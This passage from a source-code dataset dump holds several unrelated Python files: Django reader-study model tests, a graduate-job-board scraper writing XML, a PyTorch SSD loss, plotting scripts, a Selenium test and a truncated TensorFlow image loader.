len(scores) == rs.questions.count()\n questions = set(rs_questions)\n for score in scores:\n questions -= {score[\"question__question_text\"]}\n assert score[\"score__sum\"] == 2.0\n assert score[\"score__avg\"] == 1.0\n assert questions == set()\n\n scores = statistics[\"scores_by_case\"]\n assert len(scores) == rs.images.count()\n images = set(rs.images.values_list(\"name\", flat=True))\n for score in scores:\n images -= {score[\"images__name\"]}\n assert score[\"score__sum\"] == 3.0\n assert score[\"score__avg\"] == 1.0\n assert images == set()\n\n with capture_on_commit_callbacks(execute=True):\n for question in rs.questions.all():\n for im in rs.images.all():\n answer = question.question_text == \"q1\" and im.name == \"im1\"\n ans = AnswerFactory(\n question=question, creator=r2, answer=answer\n 
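# Only the (q1, im1) pair matches the all-True ground truth, so r2\n                    # contributes exactly one correct answer over the 2-image x\n                    # 3-question grid: q1 sums to 3.0 and the other questions to\n                    # 2.0 in the assertions below.\n                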
)\n ans.images.add(im)\n\n del rs.statistics\n statistics = rs.statistics\n assert Answer.objects.filter(is_ground_truth=False).count() == 12\n assert statistics[\"max_score_cases\"] == 6.0\n scores = statistics[\"scores_by_question\"]\n assert len(scores) == rs.questions.count()\n questions = set(rs_questions)\n for score in scores:\n questions -= {score[\"question__question_text\"]}\n if score[\"question__question_text\"] == \"q1\":\n assert score[\"score__sum\"] == 3.0\n assert score[\"score__avg\"] == 0.75\n else:\n assert score[\"score__sum\"] == 2.0\n assert score[\"score__avg\"] == 0.5\n assert questions == set()\n\n assert sorted(statistics[\"questions\"]) == sorted(rs_questions)\n for im in rs.images.all():\n assert sorted(statistics[\"ground_truths\"][im.name].keys()) == sorted(\n rs_questions\n )\n\n\n@pytest.mark.django_db # noqa - C901\ndef test_score_for_user(reader_study_with_gt, settings):\n settings.task_eager_propagates = (True,)\n settings.task_always_eager = (True,)\n\n rs = reader_study_with_gt\n r1 = rs.readers_group.user_set.first()\n\n with capture_on_commit_callbacks(execute=True):\n for i, question in enumerate(rs.questions.all()):\n for j, im in enumerate(rs.images.all()):\n ans = AnswerFactory(\n question=question, creator=r1, answer=(i + j) % 2 == 0\n )\n ans.images.add(im)\n\n score = rs.score_for_user(r1)\n assert Answer.objects.filter(is_ground_truth=False).count() == 6\n assert score[\"score__sum\"] == 3.0\n assert score[\"score__avg\"] == 0.5\n\n\n@pytest.mark.django_db\ndef test_help_markdown_is_scrubbed(client):\n rs = ReaderStudyFactory(\n help_text_markdown=\"My Help Text\"\n )\n u = UserFactory()\n rs.add_reader(u)\n\n response = get_view_for_user(client=client, url=rs.api_url, user=u)\n\n assert response.status_code == 200\n assert response.json()[\"help_text\"] == \"
My Help Textnaughty
\"\n\n\n@pytest.mark.django_db\ndef test_case_text_is_scrubbed(client):\n u = UserFactory()\n im, im1 = ImageFactory(), ImageFactory()\n rs = ReaderStudyFactory(\n case_text={\n im.name: \"My Help Text\",\n \"not an image name\": \"Shouldn't appear in result\",\n im1.name: \"Doesn't belong to this study so ignore\",\n }\n )\n rs.images.add(im)\n rs.add_reader(u)\n\n response = get_view_for_user(client=client, url=rs.api_url, user=u)\n\n assert response.status_code == 200\n # Case should be indexed with the api url\n assert response.json()[\"case_text\"] == {\n im.api_url: \"
My Help Textnaughty
\"\n }\n\n\n@pytest.mark.django_db\ndef test_validate_answer():\n u = UserFactory()\n im1, im2, im3 = ImageFactory(), ImageFactory(), ImageFactory()\n rs = ReaderStudyFactory(\n hanging_list=[\n {\"main\": im1.name, \"main-overlay\": im3.name},\n {\"main\": im2.name, \"main-overlay\": im3.name},\n ]\n )\n rs.images.set([im1, im2, im3])\n rs.add_reader(u)\n\n q = QuestionFactory(\n reader_study=rs,\n answer_type=Question.AnswerType.BOOL,\n question_text=\"q1\",\n )\n\n answer = AnswerFactory(creator=u, question=q, answer=True,)\n answer.images.set([im1, im3])\n\n with pytest.raises(ValidationError) as e:\n Answer.validate(\n creator=u, question=q, answer=True, images=[im1, im3],\n )\n assert (\n e.value.message\n == f\"User {u} has already answered this question for this set of images.\"\n )\n\n assert (\n Answer.validate(creator=u, question=q, answer=True, images=[im2, im3],)\n is None\n )\n\n\n@pytest.mark.django_db\ndef test_validate_hanging_list():\n im1, im2, im3 = ImageFactory(), ImageFactory(), ImageFactory()\n rs = ReaderStudyFactory(\n hanging_list=[\n {\"main\": im1.name, \"main-overlay\": im3.name},\n {\"main\": im2.name, \"main-overlay\": im3.name},\n ]\n )\n rs.images.set([im1, im2, im3])\n\n assert rs.hanging_list_valid is False\n\n rs.validate_hanging_list = False\n assert rs.hanging_list_valid is True\n","sub_path":"app/tests/reader_studies_tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":13144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"67670552","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\nimport xml.etree.cElementTree as ET\nfrom xml.etree import ElementTree\nfrom xml.dom import minidom\nimport html\nimport json\nimport re\n\n\nclass All:\n def __init__(self):\n pass\n\n def prettify(self, elem):\n \"\"\"Return a pretty-printed XML string for the Element.\n \"\"\"\n rough_string = ElementTree.tostring(html.unescape(elem), 'utf-8')\n rep = minidom.parseString(rough_string)\n return rep.toprettyxml(indent=\" \")\n\n def generator_xml(self, lines, filename):\n root = ET.Element(\"jobs\")\n\n for line in lines:\n ET.SubElement(root, \"job\", {\n 'Employer': line[0],\n 'Title': line[1],\n 'Sector': line[2],\n 'Location': line[3],\n 'Provider': line[4],\n 'Link': line[5]\n })\n\n output_file = open(filename, 'w')\n output_file.write(self.prettify(root))\n output_file.close()\n\n def brightnetwork(self):\n initial_url = 'https://www.brightnetwork.co.uk/search/?job_types=1'\n page = 0\n provider = 'Brightnetwork'\n lines = []\n urls = []\n while True:\n page += 1\n url = initial_url + '&offset=%s' % page\n if url in urls:\n continue\n urls.append(url)\n initial_soup = BeautifulSoup(requests.request('GET', url=url).content, 'html5lib')\n rows = initial_soup.select('.search-result-row')\n if rows:\n for row in rows:\n try:\n employer_link = 'https://www.brightnetwork.co.uk' + row.find('a', {'class': 'result-link'})[\n 'href']\n print(employer_link)\n link_soup = BeautifulSoup(requests.request('GET', url=employer_link).content, 'html5lib')\n title = link_soup.select('.page-header')[0].text.replace(' - ', ' ').strip()\n employer = link_soup.find('div', {'class': 'field-related-company'}).a.text.strip()\n sector = link_soup.find('div', {'class': 'field-sectors'}).find(\n class_='field-item').text.strip()\n location = link_soup.find('div', {'class': 'field-locations'}).find(\n class_='field-item').text.replace('\\n', ' ').replace(' ', '').strip()\n line = [employer, 
title, sector, location, provider, employer_link + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n except Exception as e:\n print(e)\n continue\n else:\n break\n\n def target(self):\n initial_url = 'https://targetjobs.co.uk/search/all/group_facet/Vacancies?page='\n page = 0\n provider = 'TARGETjobs'\n urls = []\n lines = []\n while True:\n page += 1\n url = initial_url + str(page)\n print(page, url)\n soup = BeautifulSoup(requests.get(url=url).content, 'html5lib')\n views = soup.select('.views-row')\n if not views:\n break\n for view in views:\n if view.select('div.pane-content > a'):\n employer = view.select('div.pane-content > a')[0].text.strip()\n job = view.select('div.pane-content > h3 >a')[0]\n title = job.text.strip()\n link = 'https://targetjobs.co.uk' + job['href']\n if link in urls:\n continue\n urls.append(link)\n link_soup = BeautifulSoup(requests.get(url=link).content, 'html5lib')\n if link_soup.find('div', {'class': 'field-name-field-ad-vac-locations'}):\n location = link_soup.find('div', {'class': 'field-name-field-ad-vac-locations'}).find('div', {\n 'class': 'field-item'}).text.strip()\n else:\n location = link_soup.find('div', {'class': 'field-name-taxonomy-vocabulary-73'}).find('div', {\n 'class': 'field-item'}).text.strip()\n sector = ''\n if link_soup.select('a.sector.name'):\n sectors = link_soup.select('a.sector.name')\n for s in sectors:\n sector += s.text.strip() + '|'\n sector = sector[:-1]\n line = [employer, title, sector, location, provider, link + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n\n def milkround(self):\n initial_url = 'https://www.milkround.com/'\n soup = BeautifulSoup(requests.request('GET', url=initial_url).content, 'html5lib')\n sector_links = soup.select('div#sectorTabContent a')\n sectors = []\n locations = []\n lines = []\n provider = 'Milkround'\n for sector_link in sector_links:\n sector = sector_link.text.strip()\n sectors.append(sector)\n location_url = 'https://www.milkround.com/jobs/'\n headers = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/80.0.3987.122 Safari/537.36 '\n }\n res = requests.request('GET', url=location_url, headers=headers).text\n l_soup = BeautifulSoup(res, 'html5lib')\n l_url = l_soup.select('ul#Popular_locations a')\n for loc in l_url:\n locations.append(loc.text)\n for sec in sectors:\n for loc in locations:\n url = location_url + sec.replace(' ', '-').lower() + '/in-' + loc.replace(' ', '-').lower()\n response = requests.request('GET', url=url, headers=headers)\n url_soup = BeautifulSoup(response.content, 'html5lib')\n cards = url_soup.find_all('div', {'class': 'job'})\n print(url)\n for card in cards:\n title = card.find('div', {'class': 'job-title'}).text.replace('\\n', '').replace(' ', '').strip()\n link = card.find('div', {'class': 'job-title'}).a['href']\n employer = card.find('li', {'class': 'company'}).text.strip()\n location = card.find('li', {'class': 'location'}).text.replace('\\n', '').replace(' ', '').replace('from updateupdate', '').strip()\n line = [employer.replace(' - ', ' '), title.replace(' - ', ' '), sec.replace(' - ', ' '),\n location.replace(' - ', ' '), provider, link + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n\n def prospects(self):\n initial_url 
= 'https://www.prospects.ac.uk/browse-graduate-jobs'\n initial_soup = BeautifulSoup(requests.request('GET', url=initial_url).content, 'html5lib')\n cards = initial_soup.select('.list-browse-courses-jobs li')\n provider = 'Prospects'\n lines = []\n for card in cards:\n if 'All sectors' in card.text:\n continue\n sector = card.span.text.strip()\n sector_link = 'https://www.prospects.ac.uk' + card.a['href']\n sector_soup = BeautifulSoup(requests.get(url=sector_link).content, 'html5lib')\n all_link = 'https://www.prospects.ac.uk' + sector_soup.select('.list-browse-courses-jobs li')[0].a['href']\n link_soup = BeautifulSoup(requests.get(url=all_link).content, 'html5lib')\n rows = link_soup.select('.list-unstyled > li')\n print(all_link)\n for row in rows:\n title = row.find(attrs={'class': 'card-secondary-title'}).text.strip()\n employer = row.find(class_='card-secondary-meta').li.text.strip()\n link = 'https://www.prospects.ac.uk' + row.a['href']\n soup = BeautifulSoup(requests.get(url=link).content, 'html5lib')\n if soup.find(class_='dl'):\n dd = soup.find(class_='dl').dl.find_all('dd')\n location = ''\n for d in dd:\n location += d.text.strip() + '|'\n line = [employer, title, sector, location[:-1], provider, link + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n\n def gradcracker(self):\n initial_url = 'https://www.gradcracker.com/search/all-disciplines/engineering-jobs'\n initial_soup = BeautifulSoup(requests.get(url=initial_url).content, 'html5lib')\n lis = initial_soup.select('ul.group-disciplines > ul >li')\n provider = 'Gradcracker'\n lines = []\n for li in lis:\n sector = li.span.find(text=True, recursive=False)\n page = 0\n while True:\n page += 1\n sector_link = 'https://www.gradcracker.com' + li.a['href'] + '?page={}'.format(page)\n sector_soup = BeautifulSoup(requests.get(url=sector_link).content, 'html5lib')\n last_page = int(sector_soup.select('.pagination > li')[-2].text)\n if page > last_page:\n break\n result_cards = sector_soup.find_all('div', {'class': ['result-card']})\n print(sector_link)\n for result_card in result_cards:\n if result_card.has_attr('class') and 'carousel' in result_card['class']:\n continue\n if result_card.find(attrs={'class': 'masthead'}):\n employer = result_card.find(attrs={'class': 'masthead'})['title'].split('with')[1].strip()\n else:\n employer = ''\n jobs = result_card.find_all(attrs={'class': 'job'})\n for job in jobs:\n if job.find('h2'):\n title = job.find('h2').text.replace('\\n', ' ').replace(' ', '').strip()\n job_link = job.h2.find('a')['href']\n job_soup = BeautifulSoup(requests.get(url=job_link).content, 'html5lib')\n location = job_soup.find('span', attrs={'title': 'Location'}).parent.find('span', {\n 'class': 'font-semibold'}).find(text=True, recursive=False).strip()\n line = [employer, title, sector, location, provider, job_link + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}_Again.xml'.format(provider))\n\n def gradcracker_process(self):\n tree = ElementTree.parse('xml/Gradcracker.xml').getroot()\n links = []\n lines = []\n for item in tree.iter('job'):\n employer = item.attrib['Employer']\n title = item.attrib['Title']\n sector = item.attrib['Sector']\n location = item.attrib['Location']\n provider = item.attrib['Provider']\n link = item.attrib['Link']\n if link not in links:\n links.append(link)\n line = [employer, title, 'Engineering', location, provider, link]\n if line 
not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='Gradcracker.xml')\n\n def GRB(self):\n post_url = 'https://www.grb.uk.com/index.php?id=1635&position_type=Full-Time&isExperienced=0&division_cond=0&is_external=0&and_or_condition='\n page = 0\n provider = 'GRB'\n lines = []\n urls = []\n while True:\n page += 1\n print(page)\n payload = {\n 'page': page\n }\n res = requests.post(url=post_url, data=payload).text\n data = json.loads(res)['vacancies']\n print(data)\n if data is None:\n break\n for vacancy in data:\n title = vacancy['title']\n url = 'https://www.grb.uk.com/graduate-jobs/' + vacancy['jobUrl']\n if url in urls:\n continue\n urls.append(url)\n print(page, url)\n soup = BeautifulSoup(requests.get(url=url).content, 'html5lib')\n emp = soup.find('b', text=re.compile('Company:')).parent\n emp.find('b').decompose()\n employer = emp.text.strip()\n loc = soup.find('b', text=re.compile('Location:')).parent\n loc.find('b').decompose()\n location = loc.text.strip()\n sec = soup.find('b', text=re.compile('Job Category:')).parent\n sec.find('b').decompose()\n sector = sec.text.replace('\\n', '').replace('\\t', '').strip()\n line = [employer, title, sector, location, provider, url + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n\n def graduate(self):\n initial_url = 'https://www.graduate-jobs.com/jobs/?page='\n page = 0\n urls = []\n lines = []\n provider = 'Graduate Jobs'\n while True:\n page += 1\n url = initial_url + str(page)\n soup = BeautifulSoup(requests.get(url=url).content, 'html5lib')\n items = soup.find_all('li', {'class': 'job-list__item'})\n if not items:\n break\n if url in urls:\n continue\n urls.append(url)\n print(url)\n for item in items:\n title = item.find('span', {'class': 'job-list__title'}).text.strip()\n emp = item.find('p', {'class': 'job-list__company'})\n if emp.find('span', {'class': 'job-list__rank'}):\n emp.find('span', {'class': 'job-list__rank'}).decompose()\n employer = emp.text.strip()\n link = 'https://www.graduate-jobs.com' + item.find('a', {'class': 'job-list__link'})['href']\n link_soup = BeautifulSoup(requests.get(url=link).content, 'html5lib')\n loc = link_soup.find('dt', text=r'Location:').parent\n loc.find(class_='job-page-overview__title').decompose()\n location = loc.dd.text.strip()\n sec = link_soup.find('dt', text=r'Sectors:').parent\n sec.find(class_='job-page-overview__title').decompose()\n sector = sec.dd.text.strip()\n line = [employer, title, sector, location, provider, link + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n\n def Debut(self):\n initial_url = 'https://jobs.debut.careers'\n initial_soup = BeautifulSoup(requests.get(url=initial_url).content, 'html5lib')\n sectors = initial_soup.select('#industry_sector-container > li > a')\n lines = []\n for sec in sectors:\n sector = sec.text.strip()\n sec_url = initial_url + sec['href'] + '-from_'\n count = -29\n provider = 'Debut'\n while True:\n count += 30\n url = sec_url + str(count)\n print(url)\n soup = BeautifulSoup(requests.get(url=url).content, 'html5lib')\n cards = soup.find_all('a', {'class': 'job-card'})\n if not cards:\n break\n for card in cards:\n link = 'https://jobs.debut.careers/' + card['href']\n title = card.select('.details .position')[0].text.strip()\n employer = card.select('.details .description')[0].text.split('·')[0].strip()\n location = 
card.select('.details .description')[0].text.split('·')[2].strip()\n line = [employer, title, sector, location, provider, link + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n\n def gradtouch(self):\n path = 'HTML/gradtouch.html'\n file = open(file=path)\n data = file.read()\n soup = BeautifulSoup(data, 'html5lib')\n cards = soup.find_all('li', {'class': 'c-tile--reg'})\n provider = 'Gradtouch'\n lines = []\n for card in cards:\n link = card.a['href']\n print(link)\n employer = card.find(class_='c-jobTile__title--reg').text.strip()\n title = card.find(class_='c-tile__subtitle--reg').text.strip()\n loc = card.find('ul', class_='c-jobTile__locations')\n location = ''\n if loc:\n sub_ls = loc.find_all('li')\n for sub_l in sub_ls:\n location += sub_l.text + ', '\n location = location.strip()[:-1].strip()\n else:\n location = card.find('span', {'class': 'c-jobTile__locationText'}).text.strip()\n line = [employer, title, '', location, provider, link]\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n\n def Add(self):\n path = 'xml/'\n for origin, directories, files in os.walk(path):\n file_list = files\n lines = []\n for file in file_list:\n print(file, '===========================================================================')\n base_tree = ElementTree.parse(path + file).getroot()\n for item in base_tree.iter('job'):\n employer = item.attrib['Employer']\n title = item.attrib['Title']\n sector = item.attrib['Sector']\n location = item.attrib['Location']\n provider = item.attrib['Provider']\n link = item.attrib['Link']\n line = [employer, title, sector, location, provider, link]\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='Total.xml')\n\n\nif __name__ == '__main__':\n print('=============================Start===============================')\n a = All()\n a.brightnetwork()\n a.target()\n a.milkround()\n a.prospects()\n a.gradcracker()\n a.GRB()\n a.graduate()\n a.Debut()\n # a.gradtouch()\n a.Add()\n print('============================= The End ===========================')\n","sub_path":"xml_scrape.py","file_name":"xml_scrape.py","file_ext":"py","file_size_in_byte":19610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"56661895","text":"#Exercício 4\n\n#Faça um algoritmo que calcule e escreva a média aritmética dos números inteiros entre 15 (inclusive) e 100 (inclusive).\n\nsoma = 0\ncontador = 0\n\n\nfor i in range(15,101):\n soma = soma + i\n contador = contador + 1\nnum = soma / contador\n\nprint(\"A média é: \" + str(num))\n\n# print(contador)\n\n\n\n","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"183117539","text":"import csv\nimport random\ndef readprofiles():\n f = open(\"MOCK_DATA.csv\",\"r\")\n s = f.read()[:-1]\n f.close()\n profiles = []\n people = s.split(\"\\n\")\n a = \"\"\n for person in people:\n person = person.split(\",\")\n profile = {}\n profile[\"id\"] = person[0]\n profile[\"first\"] = person[1]\n profile[\"last\"] = person[2]\n profile[\"email\"] = person[3]\n profile[\"country\"] = person[4]\n profile[\"ip\"] = person[5]\n profiles.append(profile)\n return profiles\n\ndef randomprofile():\n profiles = readprofiles()\n profileNum = random.randint(0,99)\n 
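# randint is inclusive on both ends, so this hard-codes the assumption\n    # that MOCK_DATA.csv holds at least 100 rows; random.randint(0, len(profiles) - 1)\n    # or random.choice(profiles) would track the actual file size instead.\n    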
return profiles[profileNum]\n\ndef searchprofile(name):\n i = 1\n fixedName=\"\"\n while (i < len(name)):\n if name[i].isupper():\n fixedName = name[:i] + \" \" + name[i:]\n i+=1\n name = fixedName.split(\" \")\n profiles = readprofiles()\n for person in profiles:\n if person[\"first\"]==name[0] and person[\"last\"]==name[1]:\n return person\n return {\n \"id\": \"\",\n \"first\": \"Does Not Exist\",\n \"last\": \"\",\n \"email\": \"\",\n \"country\": \"\",\n \"ip\": \"\"}\n\n","sub_path":"5/06_jquery_data/ho_gerstein/readfile.py","file_name":"readfile.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"297278687","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 25 17:23:26 2020\n\n@author: ramiro\n\"\"\"\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams, cycler\n\n\nif os.name == 'posix':\n Linux = True\n\nplt.rc('text', usetex=Linux)\nplt.rc('font', family='serif')\n\nTitleSize = 15\nAxisLabelSize = 15\nLegendSize = 12\n\n# Para una transición suave de colores entre las curvas:\nN_curvas = 7 # cantidad de curvas\ncmap = plt.cm.plasma #coolwarm, viridis, plasma, inferno, magma, cividis\nrcParams['axes.prop_cycle'] = cycler(color=cmap(np.linspace(0, 1, N_curvas)))\n\nrho = [0.36, 0.46, 0.58, 0.75, 0.9, 1]\n\n# Gráfico de E_tot:\n\nplt.figure()\n\nfor r in rho:\n data = np.loadtxt('Barrido(T=0.1-2.5,rho=%g).dat'%r, skiprows=1, delimiter=' ', unpack=False)\n\n Ekin = data[:,0]\n Epot = data[:,1]\n Etot = data[:,2]\n Temp = data[:,3]\n Pres = data[:,4]\n a=len(Ekin)\n iteracion=np.linspace(1,a,a)\n \n\n plt.plot(Temp,Etot, label=r'$\\rho = %g$'%r)\n\nplt.xlabel(r'Temperatura', fontsize=AxisLabelSize)\nplt.ylabel(r'$E_{tot}$', fontsize=AxisLabelSize)\nplt.title(r'', fontsize=TitleSize)\n\nplt.legend(loc='best', fontsize=LegendSize)\nplt.grid(axis='both', color='k', linestyle='dashed', linewidth=2, alpha=0.2)\nplt.show()\n\nplt.savefig('E_tot.png')\n\n# Gráfico de Presión:\n\nplt.figure()\n\nfor r in rho:\n data = np.loadtxt('Barrido(T=0.1-2.5,rho=%g).dat'%r, skiprows=1, delimiter=' ', unpack=False)\n\n Ekin = data[:,0]\n Epot = data[:,1]\n Etot = data[:,2]\n Temp = data[:,3]\n Pres = data[:,4]\n a=len(Ekin)\n iteracion=np.linspace(1,a,a)\n \n\n plt.plot(Temp, Pres, label=r'$\\rho = %g$'%r)\n\nplt.xlabel(r'Temperatura', fontsize=AxisLabelSize)\nplt.ylabel(r'Presión', fontsize=AxisLabelSize)\nplt.title(r'', fontsize=TitleSize)\n\nplt.legend(loc='best', fontsize=LegendSize)\nplt.grid(axis='both', color='k', linestyle='dashed', linewidth=2, alpha=0.2)\nplt.show()\n\nplt.savefig('Presion.png')","sub_path":"3 - Dinámica Molecular/Nuevos Códigos/Barridos(Energía y Presión)/Barridos.py","file_name":"Barridos.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"344224978","text":"# -*- coding: utf-8 -*-\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom data import coco as cfg\nfrom ..box_utils import match, log_sum_exp, decode, nms\n\n\nclass PrecisionLoss(nn.Module):\n \"\"\"SSD Weighted Loss Function\n Compute Targets:\n 1) Produce Confidence Target Indices by matching ground truth boxes\n with (default) 'priorboxes' that have jaccard index > threshold parameter\n (default threshold: 0.5).\n 2) Produce localization target by 'encoding' variance into offsets of 
ground\n truth boxes and their matched 'priorboxes'.\n 3) Hard negative mining to filter the excessive number of negative examples\n that comes with using a large number of default bounding boxes.\n (default negative:positive ratio 3:1)\n Objective Loss:\n L(x,c,l,g) = (Lconf(x, c) + αLloc(x,l,g)) / N\n Where, Lconf is the CrossEntropy Loss and Lloc is the SmoothL1 Loss\n weighted by α which is set to 1 by cross val.\n Args:\n c: class confidences,\n l: predicted boxes,\n g: ground truth boxes\n N: number of matched default boxes\n See: https://arxiv.org/pdf/1512.02325.pdf for more details.\n \"\"\"\n\n def __init__(self, num_classes, overlap_thresh, prior_for_matching,\n bkg_label, top_k, encode_target, nms_thresh, conf_thresh,\n use_gpu=True):\n super(PrecisionLoss, self).__init__()\n self.use_gpu = use_gpu\n self.num_classes = num_classes\n self.threshold = overlap_thresh\n self.background_label = bkg_label\n self.encode_target = encode_target\n self.use_prior_for_matching = prior_for_matching\n self.variance = cfg['variance']\n self.top_k = top_k\n if nms_thresh <= 0:\n raise ValueError('nms_threshold must be non negative.')\n self.nms_thresh = nms_thresh\n self.softmax = nn.Softmax(dim=-1)\n self.conf_thresh = conf_thresh\n\n def forward(self, predictions, targets):\n \"\"\"Multibox Loss\n Args:\n predictions (tuple): A tuple containing loc preds, conf preds,\n and prior boxes from SSD net.\n conf shape: torch.size(batch_size,num_priors,num_classes)\n loc shape: torch.size(batch_size,num_priors,4)\n priors shape: torch.size(num_priors,4)\n\n targets (tensor): Ground truth boxes and labels for a batch,\n shape: [batch_size,num_objs,5] (last idx is the label).\n \"\"\"\n loc_data, conf_data, priors = predictions\n# torch.save(loc_data, 'inter/loc_data.pt')\n# torch.save(conf_data, 'inter/conf_data.pt')\n# torch.save(priors, 'inter/priors.pt')\n# torch.save(targets, 'inter/targets.pt')\n num = loc_data.size(0)\n priors = priors[:loc_data.size(1), :]\n # confused here, why stuck at loc_data size 1\n num_priors = (priors.size(0))\n# prior_data = priors.view(1, num_priors, 4)\n# print(prior_data.size())\n num_classes = self.num_classes\n\n # match priors (default boxes) and ground truth boxes\n loc_t = torch.Tensor(num, num_priors, 4)\n # [num, num_priors, 4]\n conf_t = torch.LongTensor(num, num_priors) \n # [num_priors] top class label for each prior\n for idx in range(num):\n truths = targets[idx][:, :-1].data\n labels = targets[idx][:, -1].data\n defaults = priors.data\n match(self.threshold, truths, defaults, self.variance, labels,\n loc_t, conf_t, idx)\n if self.use_gpu:\n loc_t = loc_t.cuda()\n conf_t = conf_t.cuda()\n # wrap targets\n loc_t = Variable(loc_t, requires_grad=False)\n conf_t = Variable(conf_t, requires_grad=False)\n \n conf_preds = self.softmax(conf_data.view(num, num_priors,\n self.num_classes))\n # print(conf_preds.max()) 0.98\n conf_preds_trans = conf_preds.transpose(2,1)\n # [num, num_classes, num_priors]\n conf_p = torch.zeros(num, num_priors, num_classes).cuda()\n # [num, num_priors, num_classes]\n loc_p = torch.zeros(num, num_priors, 4).cuda()\n # Decode predictions into bboxes\n for i in range(num): \n decoded_boxes = decode(loc_data[i], priors, self.variance)\n # For each class, perform nms\n conf_scores = conf_preds_trans[i].clone()\n for cl in range(1, self.num_classes):\n c_mask = conf_scores[cl].gt(self.conf_thresh)\n scores = conf_scores[cl][c_mask]\n if scores.size(0) == 0:\n continue\n # fliter low conf predictions\n l_mask = 
c_mask.unsqueeze(1).expand_as(decoded_boxes)\n boxes = Variable(decoded_boxes[l_mask].view(-1, 4), requires_grad=False)\n # idx of highest scoring and non-overlapping boxes per class\n # boxes [num_priors(has been flitered), 4] location preds for i'th image\n ids, count = nms(boxes, scores, self.nms_thresh, self.top_k)\n conf_p[i, c_mask, cl] = conf_preds[i, c_mask, cl] # [num, num_priors, num_classes]\n loc_p[i, l_mask[:,0].nonzero()[ids][:count]] = loc_data[i, l_mask[:,0].nonzero()[ids][:count]] # [num, num_priors, 4]\n # check each result if match the ground truth\n effect_conf = conf_p.sum(2) != 0\n effect_conf_idx = effect_conf.unsqueeze(2).expand_as(conf_p)\n effect_loc_idx = effect_conf.unsqueeze(2).expand_as(loc_t)\n # [num, num_priors, num_classes] binary metric, thousands will be True in million\n# torch.save(conf_preds, 'inter/conf_preds.pt')\n# torch.save(effect_conf, 'inter/effect_conf.pt')\n# torch.save(effect_loc, 'inter/effect_loc.pt')\n# torch.save(conf_p, 'inter/conf_p.pt')\n# torch.save(conf_t, 'inter/conf_t.pt')\n# torch.save(effect_conf, 'inter/effect_conf.pt')\n loss_c = F.cross_entropy(conf_p[effect_conf_idx].view(-1, num_classes), conf_t[effect_conf].view(-1), size_average=False)\n loss_l = F.smooth_l1_loss(loc_p[effect_loc_idx], loc_t[effect_loc_idx], size_average=False)\n # conf_p [num*num_p, num_classes] conf_t [num*num_p, 1(label)]\n N = effect_conf_idx.data.sum()\n loss_l /= N.float()\n loss_c /= N.float()\n return loss_l, loss_c\n","sub_path":"layers/modules/precision_loss.py","file_name":"precision_loss.py","file_ext":"py","file_size_in_byte":6553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"536616013","text":"import unittest\nfrom selenium import webdriver\n\nclass BaseTestCase(unittest.TestCase):\n def setUp(self):\n # create a new Firefox session\n self.driver = webdriver.Chrome()\n self.driver.implicitly_wait(30)\n self.driver.maximize_window()\n\n # Navigate to the application homepage\n self.driver.get('http://demo-store.seleniumacademy.com/')\n\n def test_enter_text(self):\n input_text = \"//input[@name='q']\"\n self.search_field = self.driver.find_element_by_xpath(input_text)\n # self.search_field.click()\n self.search_field.clear()\n self.search_field.send_keys('earphones')\n self.search_field.submit()\n\n def tearDown(self):\n # close the browser window\n self.driver.quit()\n","sub_path":"test_searchfield.py","file_name":"test_searchfield.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"562623784","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 16 16:26:03 2018\n# 对于梯度耗尽的问题 进行改善\n@author: Administrator\n\"\"\"\nimport cv2 \nimport os,glob\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom skimage import color,transform\n\ntf.reset_default_graph()\n\nw = 44\nh = 36\nc = 1\nsuffix = '/*.jpg'\n#test_path = \"E:/BaiduYunDownload/ORL/ORL_test/\"\n#train_path = \"E:/BaiduYunDownload/ORL/ORL_train/\"\ntest_path = \"E:/BaiduYunDownload/mylibrary/test/\"\ntrain_path = \"E:/BaiduYunDownload/mylibrary/train/\"\n\ndef read_image(path,w,h,c):\n \n label_dir = [path+x for x in os.listdir(path) if os.path.isdir(path+x)]\n images = []\n labels = []\n for index,folder in 